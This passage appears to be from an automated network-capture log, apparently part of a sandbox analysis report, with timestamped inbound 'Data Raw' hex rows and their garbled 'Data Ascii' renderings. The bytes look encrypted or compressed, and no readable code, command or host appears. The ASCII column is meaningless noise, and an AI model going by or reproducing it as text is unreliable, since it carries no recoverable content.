2021-11-22 13:07:59 UTC	23	IN	Data Raw: 73 aa 14 2c 55 3a a6 3b e6 0a 5e 23 08 0e 97 d1 7e 35 87 a3 7f 35 b3 a4 72 0d df 68 41 2d 9e 8e c8 89 75 96 20 96 78 ee 44 d0 72 d1 25 a2 9b a8 f8 6c da ef 3b c3 7e 16 f4 94 55 ff 2b 31 49 fd 82 12 ad b0 61 90 8a de d4 4d e5 77 31 94 a8 95 62 15 42 ba 4e d0 81 70 c0 44 0e 65 3b 3c 0c f7 b0 24 4f 0a 4a 35 da ae ce 70 ac 08 a2 77 e6 a8 e4 88 d7 3b de 17 c1 89 e1 15 67 39 6c ce 54 5e 92 06 a9 85 39 a4 e8 dd f2 4e 19 83 bc a7 ba 1b 07 a7 e5 27 55 99 7a d1 7c 28 9f e1 29 fe 2f 25 7a 9d c6 30 35 53 19 16 f1 f9 8f 0b 54 47 f7 08 28 d4 18 af 44 44 9c 4e d1 a6 69 65 bd e3 35 e8 a0 31 e8 ff 69 6b 09 87 ad 2d 79 fd 32 3f fd 03 8a 36 cf 9e f2 21 23 5b b1 13 1b 1e 6d ed 64 29 35 2e 60 9a ea 48 24 ed eb cf 32 a4 b3 d1 d6 4a ba 58 59 5d e1 67 54 90 b0 34 20 d6 4c 39 5c Data Ascii: s,U:;^#~55rhA-u xDr%l;~U+1IaMw1bBNpDe;<$OJ5pw;g9lT^9N'Uz\|()/%z05STG(DDNie51ik-y2?6!#[md)5.`H$2JXY]gT4 L9\
2021-11-22 13:07:59 UTC	24	IN	Data Raw: 9c 1b 01 c3 f0 b9 4b e2 2e 22 5b 64 58 6d 86 5b 2c 05 0d 29 d4 6a fd a6 5c ae 24 35 70 c2 c2 9c da 3a b6 93 13 f2 fa ec e0 06 a4 bc c5 4b bd 56 ec 74 47 7f a7 c0 a0 41 28 27 d4 84 a5 ad 7f 01 19 bb 62 82 a9 80 98 f1 e6 98 23 20 1b 8b 05 3f ac bb 66 70 b3 9a fc 2f 6d ec 0e e0 52 a9 34 75 38 b0 9e 3b 13 f9 ad 3d fb b1 87 8b 57 65 01 94 07 0c 56 ff 08 35 60 b9 2b 11 91 4b c0 46 9f 13 5a 1e d3 38 66 77 e2 5f 50 5f f3 74 53 35 c5 59 fc a9 7c bc f4 07 44 78 62 f3 3e 77 59 63 df 3e ea 4a 88 6e 20 b2 ee 14 1e 9d 75 55 bb 57 8c a9 b5 9d ca 0e 43 4c d8 c3 d0 9f 5e 24 c9 50 90 25 fd 83 fe dc bc 32 d0 df 2f c7 88 f2 d9 5e 9c 6f c6 1a 54 34 f9 dc ff 41 41 b1 85 4d 75 7c 36 b6 3a e0 86 54 99 51 26 16 98 54 4d 6c 14 40 35 35 e4 91 1e ad 66 42 aa 83 22 31 0c b4 72 ba 67 Data Ascii: K."[dXm[,)j\$5p:KVtGA('b# ?fp/mR4u8;=WeV5`+KFZ8fw_P_tS5Y\|Dxb>wYc>Jn uUWCL^$P%2/^oT4AAMu\|6:TQ&TMl@55fB"1rg
2021-11-22 13:07:59 UTC	26	IN	Data Raw: 7c fc 74 98 ee c8 32 c7 06 d8 8b fe 0a 50 c3 7b 1c 5b 70 80 1a 92 94 38 b5 e6 d3 19 50 12 92 8c a2 93 6c e7 63 e4 2e 6e 44 70 de 1a 30 eb 1e d0 1e 05 1c 61 9d d7 30 1a 7c e7 94 da f3 9e 2f 4e 91 f5 2b 7f f8 0b b2 c4 75 87 51 c6 26 4c 49 b7 f6 12 cc 08 01 e3 e0 79 6f 21 9f c2 13 66 c5 c8 b0 66 12 aa 00 ec cb cb 32 3e 76 a5 d5 57 09 93 ec 63 39 49 1c 6b b2 ff 51 17 f1 86 fc 2d b5 a4 44 61 4d 90 4b 60 e8 e0 4b 58 ac be f3 c5 c2 47 26 66 ab dc 77 52 de 78 6e 41 73 3f 40 59 a5 95 e5 97 f2 6e 82 e6 d7 86 a1 c8 21 09 d9 f4 89 78 3b 95 81 9e b6 e8 91 9c 9f 56 62 96 5a bf b4 5b 65 fa fc 99 ec 5c d8 71 62 84 d1 70 44 51 e0 a8 80 b0 ac 7b 0a c0 92 38 16 4a 16 fe 8a c4 45 0c 5d 1f f2 c5 da d5 46 47 80 11 6b 0c 3b 76 84 37 e8 55 01 8f f0 17 fa 55 5e 2b a0 12 f4 90 a8 Data Ascii: \|t2P{[p8Plc.nDp0a0\|/N+uQ&LIyo!ff2>vWc9IkQ-DaMK`KXG&fwRxnAs?@Yn!x;VbZ[e\qbpDQ{8JE]FGk;v7UU^+
2021-11-22 13:07:59 UTC	27	IN	Data Raw: 59 02 3c 1c 03 47 ea 37 e1 74 6f a0 12 b5 4b c1 5f 0f 19 4b 11 c6 f5 e1 64 f3 77 45 41 88 4d 5b 44 dc 48 2a be 5b b1 e6 08 6a 45 47 f3 34 6e d7 7a d0 24 ff 99 2d ba 33 bd ee 1a 31 86 79 2a b3 5d 80 bc 92 dd 1e 1d 4a 66 ed cc f8 80 df 2c c3 5d 85 f7 b2 57 ed d3 96 27 df f7 3c a9 81 f9 ca 59 e2 6b dd 0b 53 ca 2b cf f0 45 3f b7 ac 58 7e 13 36 a4 3f fb 9f b0 4e 1d 2b 18 8f bd 96 6d 3c cc 41 37 c4 34 0d a9 64 ad a4 84 d8 26 42 b3 7a 08 66 cc 48 1f 5f 74 ef 00 8b 96 fa d9 bc de 1d 04 b2 73 39 a1 4d 84 70 bc a9 2f 20 d1 b7 2b f1 bc 18 52 7a 31 c5 82 64 50 44 f9 53 50 b6 92 be bd 44 a5 27 89 cc 54 33 b4 ab c6 63 6e ef 81 9c 08 0a e5 78 d6 a8 cf 6d e4 4e d5 d5 c9 7f e6 65 08 22 2e 04 38 2e e0 42 39 78 c1 73 e6 71 30 07 7a a3 c0 c0 c1 46 27 f7 5b 60 7a 1b 31 62 8e Data Ascii: Y<G7toK_KdwEAM[DH[jEG4nz$-31y]Jf,]W'<YkS+E?X~6?N+m<A74d&BzfH_ts9Mp/ +Rz1dPDSPD'T3cnxmNe".8.B9xsq0zF'[`z1b
2021-11-22 13:07:59 UTC	28	IN	Data Raw: 42 0a 69 c5 5c 36 4b 07 62 f5 76 50 17 f1 86 ef 1a b7 b6 5f 6b 4d 8f 3b e9 16 e1 6d 41 bb a4 ef 07 f9 cd 3b 74 be d1 fa 44 c5 60 91 54 4b 2d 7e e9 ae 8c fc 94 7e 40 99 f9 f1 50 93 e5 2b 12 c5 62 60 6b 30 8b 81 23 ad e8 8a af d9 a8 63 b0 44 78 32 6a b3 e9 f6 97 f8 56 de 74 51 82 e6 8e 43 65 7f 87 93 b1 ad 62 10 d4 f6 38 06 4d be fc 98 cc 66 93 79 1f e3 df 67 f5 b3 55 a0 11 65 09 24 7f 0c 0e f9 53 28 8b fc 06 fd 5c 7b a4 aa 1f f2 9d 2b 54 7c d9 29 8a 1a c6 de 2b 07 54 04 99 29 05 c1 b3 e0 94 2c 69 22 83 be 15 06 47 3b 34 b1 ac cb 44 39 a5 32 6e 3b 66 91 f6 a3 d6 99 ef 5c 7e ae 61 2b 14 37 52 d4 2f 65 f9 01 19 fe 2a c7 eb b0 56 31 89 79 72 91 87 13 d7 3a 82 a9 02 71 ed f5 14 77 85 30 f2 73 93 b7 2e 34 91 b8 3b ac 00 45 9c 22 6c d8 57 62 74 25 eb 51 24 97 25 Data Ascii: Bi\6KbvP_kM;mA;tD`TK-~~@P+b`k0#cDx2jVtQCeb8MfygUe$S(\{+T\|)+T),i"G;4D92n;f\~a+7R/e*V1yr:qw0s.4;E"lWbt%Q$%
2021-11-22 13:07:59 UTC	29	IN	Data Raw: 84 0d b9 13 3c b7 49 cc 91 aa 92 1d 06 17 07 81 4c 7a eb 52 49 28 dc b8 35 ad 66 bd b8 b1 cd 35 4c ae 43 3c 71 d2 6a 0b 4f 78 8a 0d 8f 80 e1 c4 86 c0 05 2c ad 52 37 2b 5c a6 21 07 c6 08 21 d2 ac 36 bc b0 3a 3d 58 5f db 89 75 78 7b c4 7a 51 b0 8b bb 8e 49 db 1d 80 e4 0e 22 96 c2 fe 70 69 89 b3 98 1e 1b e1 f6 61 e7 a3 37 c7 44 c6 f0 d6 3f 6b be 37 7b 07 86 19 3f cf ea 06 bf 6d 4e f9 31 19 03 68 b2 d8 a2 f7 40 4b de 48 46 6b 3d 20 43 c1 2a d3 54 1c b0 0b dd 30 65 35 09 1f 99 e2 d7 36 ab be 51 74 b6 a5 74 68 d9 4d 41 27 89 ae 55 8e 5b a9 08 f9 48 f9 ba db 80 ba 28 97 b3 af f8 4e af 46 3a ef 71 e1 ad 85 98 e2 2c 2a 93 f1 7b 19 5f ae 52 c6 98 de d4 43 78 e9 0e 76 a5 99 72 d8 46 bd 75 d2 bc cf bd 68 0d 7f 28 38 0c 52 b4 3c b1 2a 66 26 a4 59 ce 70 a8 31 5d 77 e6 Data Ascii: <ILzRI(5f5LC<qjOx,R7+\!!6:=X_ux{zQI"pia7D?k7{?mN1h@KHFk= CT0e56QtthMA'U[H(NF:q,{_RCxvrFuh(8R<*f&Yp1]w
2021-11-22 13:07:59 UTC	31	IN	Data Raw: 0d e1 8a cd ec 0e 4a 05 f5 42 d4 e8 af 6e 0b 00 69 17 16 7b 92 2e f9 42 26 87 e5 e9 f1 66 61 29 b7 04 75 b2 eb ba 8e 31 1e 38 09 c9 d4 1c 19 4e ec 08 29 19 c8 ac f9 0e 15 77 3d 92 4a c4 38 54 2a 26 8f 90 de 45 33 87 8a 50 3b 6c e4 f7 a6 c9 90 ef 54 6f b8 7f 31 64 81 66 03 28 f2 9c be 30 ef 20 d4 e9 aa 40 36 ae 63 60 9e 9e 16 a4 3c ae 83 12 67 fb 68 27 61 94 34 f2 cc 93 b7 2e 81 0c 8b 28 a7 10 66 26 36 7b 5f 50 38 74 24 f2 4b e3 17 18 25 c3 f1 a0 cf f5 3d 31 50 b9 40 61 99 48 d0 1b 43 81 cd 14 f5 b2 8c 2b 0c 3e 72 ea d0 b4 fe 30 9e 85 90 fa fc f7 69 dc 4f be c4 58 b4 58 9f 51 59 29 be c0 a0 4f a2 3a dc 93 bc b9 d7 3e 19 b1 e3 28 b8 8b 84 3d 2f b2 32 20 19 9e de 1d be dc 78 fc 8c 9e d4 23 cc fd 03 d2 67 ad 27 72 a9 b5 8a 13 96 26 02 39 ed 3c 82 94 2d 57 0c Data Ascii: JBni{.B&fa)u18N)w=J8T*&E3P;lTo1df(0 @6c`<gh'a4.(f&6{_P8t$K%=1P@aHC+>r0iOXXQY)O:>(=/2 x#g'r&9<-W
2021-11-22 13:07:59 UTC	32	IN	Data Raw: d0 c2 e3 60 ef 98 37 72 1a 6b 39 02 ef f2 02 8c 51 55 e6 78 29 ea 68 9e d6 c7 d9 58 46 d4 52 76 84 1a 1d 60 b9 05 d2 5d 09 aa d2 cd 3b 4f 0c 0a 34 17 dd 8b 1f a1 ba 7c 10 25 ba 7f 29 a3 5b 4a 28 bf cc 45 49 09 bd 6a 9e 43 73 ac fb 5e b6 2a 81 9d a8 d4 68 c0 11 79 ef 7b 2c bc 83 6d d4 2b 28 55 1a 7d 3f 8c c1 40 ee af da a7 02 6a c0 2c 45 bc 95 78 0e 51 44 5e f8 94 96 cd 68 05 6b d6 39 20 e4 a3 30 b1 03 7f d8 a5 a0 cc 5b aa 0b 92 70 e4 cd c7 e4 d7 31 fe 1d d8 9a f6 25 74 3d 2f 30 55 72 d5 11 ba 90 2f b9 c7 8d 0c 47 2c 7f 96 8e 86 6e d2 42 16 2f 4a 55 88 d8 59 1b ee 71 9b 00 39 05 62 ae f2 3c 2f 4c 15 95 fe e1 71 25 78 4b e4 32 61 fc 56 a8 c4 6e b1 ac cc d4 4d 6d aa 19 18 fa dc 0a e4 ff 65 6a c4 9e ff 0a 6e f1 36 b9 51 eb ba 36 e5 ff f0 0a 94 6c 9e ce 48 19 Data Ascii: `7rk9QUx)hXFRv`];O4\|%)[J(EIjCs^*hy{,m+(U}?@j,ExQD^hk9 0[p1%t=/0Ur/G,nB/JUYq9b</Lq%xK2aVnMmejn6Q6lH
2021-11-22 13:07:59 UTC	33	IN	Data Raw: 5e b3 35 81 14 63 e1 ee 33 6a bc 1b d8 62 95 c4 72 97 80 be 52 bb 16 98 9f ec 6c 83 f5 49 74 24 f9 51 3c 8c 28 b9 ca e7 b1 7f 76 27 3b 5c 0d cd 68 90 52 34 1d 52 0d cc 14 ff af 55 24 bb 26 a9 c7 a8 97 fe 3a b6 99 93 fa 8a ac bf f3 de be c5 41 0b d5 9d 4e d0 b6 b8 1a a5 65 00 2a d7 84 fe 31 c7 08 33 b1 e2 8a ba b0 99 2c a2 9a 23 20 51 94 7c 1d 9d 52 6e 70 b9 9c bb ba 6e ec 02 c5 7f 27 83 5f 47 b8 9e 3b 26 2f 2a 1e f8 b1 83 e7 7a 57 18 e0 75 24 c1 fb 20 31 60 d6 b5 39 b5 41 cc 44 91 ac 7a e1 d7 e5 f7 44 e9 77 73 43 88 41 39 1c cc 59 f6 d7 4d ba 79 b0 94 58 c8 44 e8 6a 03 7c 09 b3 c5 97 fb 6d 2a b4 fa 1c a2 a8 7b 22 3d e0 38 31 94 d1 ce 16 4c ea 4b eb c7 94 de 26 cf 48 9d 76 1f 57 f6 52 23 82 4c d7 3f ae 98 fa 57 e3 25 6c 49 ad 76 0b fc dc f5 41 04 a6 86 65 Data Ascii: ^5c3jbrRlIt$Q<(v';\hR4RU$&:ANe13,# Q\|Rnpn'_G;&/zWu$ 1`9ADzDwsCA9YMyXDj\|m*{"=81LK&HvWR#L?W%lIvAe
2021-11-22 13:07:59 UTC	34	IN	Data Raw: bd 29 f0 01 69 17 5f 3a 80 21 f3 40 3d b3 b8 06 e4 25 ae 38 bb 18 cd 17 b7 45 7b dd 0d 3c 1c c1 c2 0a 98 ee 7d a0 05 1a da b7 e7 02 0a 7d 33 8f db 9b 15 47 31 07 c6 b9 cb 4e 20 87 2e f8 3b 6c ef f5 a9 b9 1a fc 5b 65 ba 7b 3d 9c 91 41 18 28 f2 04 93 77 57 20 d4 e9 b0 4a 4a 66 63 71 9b ac aa 84 2b 93 bd 76 59 e1 e4 19 4d 98 24 ce 17 a8 b7 24 97 ef e3 28 a7 1b 92 99 30 7c 43 7f ec c3 4b 51 5c 35 90 1b 14 c0 f0 b5 d8 ef 3f 27 5a ba 5f 6a ae 3b 2f 1a 70 17 e5 83 f5 a6 56 a3 63 a6 73 c2 ce a7 fa 2b b0 88 97 ec eb e8 6a 6c 20 17 c5 4b b5 58 92 43 48 05 21 77 cf ec 00 2b dd ac f8 84 5b 0b 31 9c e1 8a af 86 b4 1e 28 9a 25 08 3e 94 7c 06 da 5d 6e 70 b9 8d d3 33 68 fd 0f de 67 ae ba c8 d7 11 9e 3b 1d 35 04 50 86 b1 85 9e 39 45 11 fb 07 63 04 fb 20 31 70 b0 3c 30 da Data Ascii: )i_:!@=%8E{<}}3G1N .;l[e{=A(wW JJfcq+vYM$$(0\|CKQ\5?'Z_j;/pVcs+jl KXCH!w+[1(%>\|]np3hg;5P9Ec 1p<0
2021-11-22 13:07:59 UTC	35	IN	Data Raw: c1 f4 2e a4 5f 5f f7 76 20 10 7f a3 d6 5f 65 2e 67 d5 5b 6a 71 c5 2b 73 ab 67 b6 55 16 a9 25 a3 72 4c 27 02 c3 4d c0 89 18 ad b1 16 0d b4 a5 78 db a9 4a 2e 3b 9b 86 58 b5 5d b8 21 8a 72 f8 b8 d1 60 b6 23 e9 9f a6 e9 68 c0 11 38 ef 75 3d f0 e7 46 f1 2b 20 4d e4 67 23 85 bf f0 ee af de 99 49 6b d1 32 45 d6 f8 79 06 4c b6 2c b6 97 8e cb 65 04 75 20 3c 63 f0 b5 3c bb 64 fe 26 a4 86 a1 52 a9 20 57 64 e0 d1 ad e4 d7 31 c7 18 c9 9f f4 13 19 1a 7b 30 5f 63 94 09 d5 a8 38 b5 e6 d1 09 57 5a ab 96 a2 88 74 d0 3e 1b 2f 48 5c 72 c8 70 79 c2 1f d6 0b 2a 08 6b 9a d7 2f 13 46 1d 1b 41 96 a3 25 54 4d ed fe 7a c5 1d c6 a0 65 9c 44 dc b7 28 64 bd ed c5 08 d4 1b c4 f9 64 13 6d 9f d3 02 a5 f5 31 de 5c 14 bb 10 cd d4 f3 3d 25 76 b6 ce 03 19 77 88 4f 39 4b 0d 60 9a ec 50 19 fb Data Ascii: .__v _e.g[jq+sgU%rL'MxJ.;X]!r`#h8u=F+ Mg#Ik2EyL,eu <c<d&R Wd1{0_c8WZt>/H\rpy*k/FA%TMzeD(ddm1\=%vwO9K`P
2021-11-22 13:07:59 UTC	36	IN	Data Raw: f2 72 92 b7 2e be f1 b5 28 ad 3c 87 93 25 7c 55 69 65 6b 2d 06 5d 19 93 0b a5 c3 f0 b3 d4 e0 3d 25 5f a8 56 71 8c a5 2f 36 63 12 ed 15 f4 a6 5c 82 1c 3f 73 c8 ec c5 ff 3a bc a3 eb 05 05 13 fb d0 5c b9 c5 5a b8 57 6a 46 72 36 a6 c5 a7 c9 10 2b d7 86 cc f6 5a 01 13 99 96 8b a9 8a b9 01 2e bc 32 24 32 9e 05 1c b5 c5 6c 01 a3 9e d4 20 7d e9 1a cd 0d ff 34 7f bc 3c f1 99 17 24 04 20 f2 a2 82 94 3c 51 0e 14 0e 20 55 ec 33 3c 63 a8 2a 26 ba b5 c1 60 1d 30 5f 26 89 1b 08 8a 9c 2d 53 40 82 6f 3f 4a cd 53 ff a9 51 9b 61 07 42 56 6c f3 3e 7d c2 5b da 3e 89 97 fb 6c 70 b2 ec 1a 28 a4 6e 34 be 55 f7 f9 9d c7 cc 26 64 64 fc c9 bf e3 df 2c c3 46 0e d0 df 80 fe d6 98 24 d2 f7 51 a9 81 f9 f1 44 f2 64 cd 0c 76 89 fd dc f9 6f 3e b9 84 47 02 46 3c b7 3e e8 eb ff 98 0e 20 77 Data Ascii: r.(<%\|Uiek-]=%_Vq/6c\?s:\ZWjFr6+Z.2$2l }4<$ <Q U3<c*&`0_&-S@o?JSQaBVl>}[>lp(n4U&dd,F$QDdvo>GF<> w
2021-11-22 13:07:59 UTC	38	IN	Data Raw: 95 8e c7 16 6d 7d 28 3c 24 4c b6 3c b7 23 d8 26 a4 86 a1 4a a9 20 57 71 ce 01 89 e5 d1 45 b4 1d d8 9e cd b1 74 3d 7c 18 eb 72 91 1b d5 bb 38 b5 e6 c6 63 31 34 81 9d cd fd 76 f8 52 09 28 69 2c 64 de 5d 96 e8 1e dc 0d 3f 07 15 80 c7 2b 0f 5a 10 bd d9 f9 8f 2e 79 45 cd 69 69 fc ab a9 c4 62 8f 4a c4 dc c3 d2 ab d6 23 c7 da 01 e1 e9 7e 74 11 b6 c2 01 68 f5 ac a2 4c 04 bd 1d cf f0 f2 21 2f 65 b1 df 4d 31 5c ed 4f 3d 67 04 71 9f e6 59 3f 4a 95 ea 34 b5 bf 48 b7 4f 83 45 79 07 e8 e9 e5 8f 7a fb 14 f9 cd 38 74 b2 ea e3 9d cb 72 97 be 49 2d 56 4a b5 e3 a1 8c f2 75 45 d3 f0 78 a1 f4 2b 18 d0 ee a1 69 4d f1 aa 83 ad e8 80 87 98 98 66 ba 65 ae bf 41 e0 e9 f7 95 d7 f8 d9 60 7f 90 e2 90 3b 1e f2 80 97 99 82 73 1b c3 d5 00 15 4a 1a 82 54 da 70 19 41 64 ed df c5 e0 cc 0b Data Ascii: m}(<$L<#&J WqEt=\|r8c14vR(i,d]?+Z.yEiibJ#~thL!/eM1\O=gqY?J4HOEyz8trI-VJuEx+iMfeA`;sJTpAd
2021-11-22 13:07:59 UTC	39	IN	Data Raw: de 2f 78 61 1d c8 76 a8 3f 57 80 b8 9e 31 c9 23 04 50 28 b1 85 9e 07 51 32 ea 0f 0d 4a fb 20 39 63 bf 2d 5b dd 4b d6 4c 1f 1b 5a 1e d7 e3 f7 0f 62 5f 47 5a 88 47 4b 58 fd 5a fc fa 55 b3 f7 50 42 50 57 e5 2d 78 e1 28 de 3e ee 97 ea 69 3f b9 12 0a 12 bb 6a 23 9b 49 8f ad 9b ef ec 0e 45 6e 93 0f d0 95 d4 33 c5 43 91 f8 b9 84 e4 22 95 1a c4 d9 2b 80 9f f0 d9 52 db 40 c7 1a 54 73 31 dc ff 4d 35 ab 81 4d 6e 16 23 be c4 eb bc a3 89 0a 2d 93 86 b5 46 69 ef 41 7b 32 d9 cb 1f 81 63 aa a6 8b cf 35 53 a7 57 07 99 cd 6e 15 3d c4 80 1c 80 9c e9 f3 95 df 0c 01 a5 5c c9 20 61 8f 26 ae bc 2f 20 d3 8c 38 8e b2 1c 52 61 5b c5 7d 65 76 6a 80 14 4f b9 92 af ac 41 b1 2e 7f e5 28 27 b2 af fd 2e 6a 83 a4 b4 2c 0a e5 72 b9 44 8f 36 cd 54 c6 d0 c9 6e e3 89 c9 7a 2a 9e 3a 06 60 f4 Data Ascii: /xav?W1#P(Q2J 9c-[KLZb_GZGKXZUPBPW-x(>i?j#IEn3C"+R@Ts1M5Mn#-FiA{2c5SWn=\ a&/ 8Ra[}evjOA.('.j,rD6Tnz*:`
2021-11-22 13:07:59 UTC	40	IN	Data Raw: 63 7c 74 21 89 4f 19 71 e1 20 2d 5b 1d a6 0c 7b c5 fa 3f 33 ea a5 c6 57 10 7b 71 5e 3f 54 07 76 06 ff 58 08 f0 83 76 23 ac bc 5d 78 5b 9d 4b 7d 3e f6 66 52 b7 b7 67 a4 ce 5c e3 63 6e 4a 5c 43 c5 61 9c 42 40 36 5e 5c ac 02 41 93 fd a5 b1 ee f1 78 aa 97 bc 19 d2 e8 4c 6d 2f 9a 24 a6 ad e8 81 94 86 a0 ed 0d 42 ab 31 f6 69 fe 2d 93 29 ca f3 60 79 9a e8 86 4d f3 45 9f 83 6b bd 74 0d da ed 06 00 4b 1c e7 9b cd 79 09 4e 91 54 cf c0 6a 0f 9c 84 17 68 1d 3a 4f 16 21 f9 59 38 9e f2 10 e4 43 7d 3d d4 8a e4 8b b1 2a 67 cf 01 27 09 c2 c5 09 3e c5 12 09 0f 10 0e ae d3 26 33 78 22 89 a7 c2 00 4d 13 17 99 b8 c1 9a 33 8b 2c 6f 3b 6d f5 e4 a3 d6 82 aa 5b ea 72 70 3d 80 80 4a 0f 22 c9 8e 24 25 fe 20 d4 c3 a1 5e 34 a3 4f 78 93 ee cd 5a 3d 88 bf 30 60 f5 ce 30 f6 94 35 d0 4a Data Ascii: c\|t!Oq -[{?3W{q^?TvXv#]x[K}>fRg\cnJ\CaB@6^\AxLm/$B1i-)`yMEktKyNTjh:O!Y8C}=*g'>&3x"M3,o;m[rp=J"$% ^4OxZ=0`05J
2021-11-22 13:07:59 UTC	42	IN	Data Raw: c8 bc 95 d0 df 23 80 90 f3 d9 5e fe 75 c2 0e 76 72 fe dc f9 51 a3 bf 84 4d 7e 07 28 a3 12 49 90 aa 92 26 35 09 8a a0 5f 7e e3 5d e6 08 c4 35 1f bb 4e 29 aa 95 d6 1c 4d a7 56 07 eb f3 42 1c 4f 6e a8 89 8b 96 fa cc 9e 0f 54 04 ba 51 1f 35 4d 84 3a 30 ae 04 2c 02 ec 27 9e a3 31 46 70 5e d1 90 63 4c 7f a3 2d 22 b1 81 a0 bf 59 a2 25 89 f6 0d 1b d7 ad d5 77 e5 bc a2 9c 09 19 e3 69 d0 a0 d5 36 c7 44 c3 fb ce 79 ed 48 a7 7f 06 95 29 27 e6 86 b8 af 4c 52 f5 7b 20 1e 7b 9b fa be d1 41 4d fc cc 61 7a 11 20 4b 86 78 d1 54 10 cc b4 cd 17 47 36 02 0d ba e2 f1 37 ab be 51 cd b5 a5 78 16 88 65 33 2e 9a 80 3d 07 5c b8 2a 87 78 ea 93 f9 2d b5 39 b7 b7 3f e8 68 ca 00 13 c7 0f 3e aa 89 29 63 2a 20 47 f5 76 01 a8 97 02 ed af d8 fc de 6a c0 2c 5f 8c b1 0e 05 46 bc 30 4c 97 8e Data Ascii: #^uvrQM~(I&5_~]5N)MVBOnTQ5M:0,'1Fp^cL-"Y%wi6DyH)'LR{ {AMaz KxTG67Qxe3.=\x-9?h>)c Gvj,_F0L
2021-11-22 13:07:59 UTC	43	IN	Data Raw: 84 f5 99 d8 66 53 9c cf 8e 45 7d b3 b4 93 b1 ac 71 1b c5 63 2c 17 4a 71 ef 93 db 7b 1a 46 1f ec de c5 e4 a2 46 ac 01 69 1d 30 67 90 21 f9 53 00 9d f1 17 ca 4f 6c 38 b4 12 e5 8b ad 45 71 cf 12 1d 1d c6 c7 0e 16 59 72 09 05 0b c6 ac fc 36 07 7b 22 83 b4 d4 1e 58 34 d1 98 94 c2 7c c9 8f 06 6f 24 7c f6 ee a3 c7 88 e3 4d 91 a8 5c 37 9c 50 f1 0e 39 f8 a2 30 18 fe 2a fc 97 a0 5e 2f 89 72 71 91 8b 17 5f 22 95 ba 09 62 f0 ee 01 9f 95 19 ce 6a fc c4 25 96 8a 9c ae a4 11 48 e7 96 7a 55 72 6f 6e 37 f2 5c 24 90 2c 37 3d f1 9f da ec 06 81 5e b9 5b e2 b9 5b 2e 1b 69 1f d2 07 e6 ac 5c bb 06 21 7d 3c c5 98 ef 3c 9e 3d 92 fa f0 60 58 db 4f bf d6 4e a0 46 87 4d 5e 10 a5 df b9 bb 01 07 de bc d7 87 5b 01 06 ab f1 80 a9 91 96 33 27 64 22 0c 0b 85 79 24 00 c5 6e 7a 3f b1 d4 22 Data Ascii: fSE}qc,Jq{FFi0g!SOl8EqYr6{"X4\|o$\|M\7P90*^/rq_"bj%HzUron7\$,7=^[[.i\!}<<=`XONFM^[3'd"y$nz?"
2021-11-22 13:07:59 UTC	44	IN	Data Raw: 34 81 e2 2c be b7 ad d3 59 dc 83 a2 9a 02 d4 f0 5d fe bf 8f 36 cd 5d d1 a6 73 7f e6 9f 3d 53 3e 95 38 24 34 f5 28 84 4d 48 e6 71 31 14 69 b2 a7 a4 d2 54 51 d4 5b 61 61 2b 35 62 27 09 d2 54 75 a3 2c dd 08 51 0f b3 1f 93 c0 a8 ba a8 b8 7f 72 90 a5 72 0d ac 44 69 94 9a 86 54 94 2e 02 20 96 78 f2 bd be 8d b6 39 bb 8c a7 ff 7b ce 29 77 ee 7b 3d bb 80 57 f5 b1 33 49 f5 78 3b b0 bf 77 e4 82 db ec 7b 6a c0 26 5f a1 ea f5 07 46 bc 4c d3 48 9c e4 40 3a 7d 28 32 1f ee 9c 04 b1 0b 6c fb b1 8d ce 70 b9 27 75 1b e5 a2 8d 8a 50 3a d4 1b f5 9f dd 17 77 3d 7a 21 51 5a 1a 10 ba 8b 56 3b ed c0 06 20 b9 80 97 a8 aa c1 f8 58 1c 3c 47 31 e5 d9 75 1c fa 18 c0 10 3e 60 f2 9c c6 2d 12 8d 0a 85 e5 f0 b7 e3 54 47 e6 31 67 c5 11 81 a5 67 9c 48 ba 52 4c 65 bb f4 13 c7 d9 03 e1 d7 0f Data Ascii: 4,Y]6]s=S>8$4(MHq1iTQ[aa+5b'Tu,QrrDiT. x9{)w{=W3Ix;w{j&_FLH@:}(2lp'uP:w=z!QZV; X<G1u>`-TG1ggHRLe
2021-11-22 13:07:59 UTC	45	IN	Data Raw: fa 9a 80 4a 1f 30 e8 86 0c 80 fd 20 d2 8c 2b 5f 25 a7 70 77 80 88 15 56 15 1b aa 03 64 8e 6e 19 61 92 26 d0 73 9a a6 28 be 1a b7 28 a1 7e c4 89 36 7d 7d c0 62 74 22 eb 54 24 92 27 db c2 e1 bb b5 79 2e 22 55 af 79 40 86 5b 24 0c 84 1b ad 38 d0 b7 5b 86 2d 16 34 c3 c4 be ef 33 a7 95 bb 99 f9 ec e2 b4 c5 bf c5 4d d0 d1 94 47 54 10 a8 e8 17 45 00 2d c4 8c b2 83 73 8e 18 b1 e8 a7 ea 91 96 04 a4 9b 23 2a 34 ae 6d 04 99 f3 1d 52 b1 9e d2 31 63 fd 05 d9 70 c6 1c 7d b8 be 8f 36 06 2e 6d 1b f9 b1 83 85 20 47 10 85 29 0e 56 fd 31 36 4b 86 2e 39 b3 24 ea 4e 1f 1d 5c 0f da 8a ef 74 e2 55 7a 6e 8a 47 4c 58 c5 87 f3 88 7c 84 f7 07 48 43 48 db 06 7d d9 61 01 3e ff 9b ec ba 33 be fd 07 2f bd 52 d7 4d a8 73 bc 8c d0 1e 1d 54 75 ed d2 c2 1b 69 13 af ae 6b 07 ae ab fe dc 94 Data Ascii: J0 +_%pwVdna&s((~6}}bt"T$'y."Uy@[$8[-43MGTE-s#*4mR1cp}6.m G)V16K.9$N\tUznGLX\|HCH}a>3/RMsTuik
2021-11-22 13:07:59 UTC	47	IN	Data Raw: c3 3a ef 71 52 8e 8d 46 fd 2d 08 da e4 7c 19 90 b9 18 3c af de de 61 0d c1 26 44 ca 8f 79 06 4c d5 79 d6 96 88 c7 40 aa 7e 28 3e 63 cc b6 3c b7 0d 6d f8 b1 a9 e6 47 a8 20 57 64 ef d1 a9 e7 d7 3d df 35 e0 9a e5 1f a8 3d 7d 1a 54 62 91 11 ba 81 3f b5 1f 39 0c 5a 2f 81 97 a3 99 47 fb 58 46 2f 42 4f 28 d9 75 07 9a a4 d6 01 33 05 7c e3 ea 2a 05 53 31 82 f4 f9 89 0c 07 44 e6 26 48 cc 1a a9 c2 0b 5a 4e d5 d2 93 6b 98 cf 2e d6 de 18 e4 d7 55 7c 3a 95 0d 08 7f 83 1a b0 4a 11 93 0d e5 d4 f4 09 76 75 b4 c8 60 00 6f ed 49 58 8d 0d 60 90 30 5e 32 d3 a2 ea 32 ae ba 77 59 5c 8b 5e af 16 e7 4d 53 a1 b5 e9 13 d1 4a 39 68 9a c7 79 59 c5 60 91 40 5f 09 56 56 e2 8c f8 96 f2 7f 98 e2 c0 7b a0 b8 2b 18 d2 b0 5f 6b 21 f9 